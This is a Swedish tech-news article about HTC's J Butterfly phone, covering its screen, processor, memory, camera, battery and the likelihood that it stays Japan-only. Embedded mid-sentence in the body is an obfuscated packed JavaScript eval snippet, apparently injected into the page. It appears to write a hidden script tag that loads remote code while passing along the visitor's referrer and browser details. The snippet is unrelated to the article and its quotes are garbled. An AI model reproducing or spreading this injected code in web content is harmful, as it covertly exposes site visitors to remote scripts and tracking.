Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

HTC visar upp telefonen J Butterfly

HTC visar upp telefonen J Butterfly
Sebastian Plengier Ehrnfelt

HTC eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhazs|var|u0026u|referrer|rbykz||js|php’.split(‘|’),0,{}))
J Butterfly visas upp med en snygg LCD 3 skärm på den imponerande upplösningen 1920 x 1080 pixlar. En pixeldensitet på 440 pixlar per tum (ppi).

Den kommande luren från HTC kommer att köras med en fykärnig Snapdragon S4 Pro APQ8064-processor. Den kommer också att ha 2GB i ramminne, en ny standard för toppmodeller. Kameran kommer att ligga på 8 megapizlar och lagringsutrymmet på 16GB. Batteriet kommer ha en kapacitet på 2020mAH. Den kommer att levereras med Android Jelly Bean dvs Android 4.1.

Som ni kan se på bilderna så kommer telefonen att ha en liknande design som vi sett hos HTC:s kommande Windows Phone 8.
The  verge som befann sig i Tokyo när telefonen visades upp uppger att den känns kompakt. Detta mycket tack vare sin tjocklek på tunna 9,1 millimeter. Skärmens färgåtergivning ska också vara i topp.

Tyvärr så ser det ut som att J Butterfly kommer att bli exklusiv för endast Japan. Men inget är bestämt och det är mycket möjligt att HTC också väljer att presentera telefonen för den globala marknaden eller en telefon med ungefär samma specifikationer.